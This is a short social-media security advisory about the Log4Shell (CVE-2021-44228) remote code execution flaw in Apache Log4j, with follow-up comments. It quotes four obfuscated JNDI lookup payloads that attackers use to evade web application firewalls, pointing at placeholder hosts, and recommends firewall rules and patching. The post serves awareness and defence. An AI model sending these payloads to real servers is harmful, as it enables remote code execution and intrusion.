Critical vulnerability in Apache Log4j library
Recently, A new zero-day exploit has been reported against the popular Log4J2 library which can allow an attacker to remotely execute code. The vulnerability has been reported with CVE-2021-44228. Many large software companies and online services use the Log4j library, including Amazon, Cisco, Apple iCloud, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more.
Attackers are using the below codes to bypass the Web Application Firewall :-
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${jndi:Idap://127.0.0.1:1389/badClassName}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
and many others...
Be aware that the following ports can be used by log4j exploit:
LDAP(S), RMI, DNS, NIS, IIOP, CORBAL, NDS, HTTP
How to protect your organization ?
You shall set a IPS rules, firewall rules, WAF rules and web filtering can all help, by blocking malicious CVE-2021-44228 data from outside, and by preventing servers from connecting to known-bad sites or unwanted.
Patch your own systems right now !!!
__________________________________________________________
#cybersecurity #CVE #CTI #DFIR #webapplicationsecurity #databases #Ismail_Ahmed
Experienced and multilingual senior manager with strong team management and extensive partner/client relationship experience worldwide.
2 年Filip Jurkiewicz
网络安全研究员
2 年List of applications that use Log4j ... https://www.rumble.run/blog/finding-log4j/
网络安全研究员
2 年Hackers start pushing malware in worldwide Log4Shell attacks https://www.bleepingcomputer.com/.../hackers-start.../
网络安全研究员
2 年Thanks to all to consider about security investment in 2022 budget to mitigate risk and preventing significant financial losses.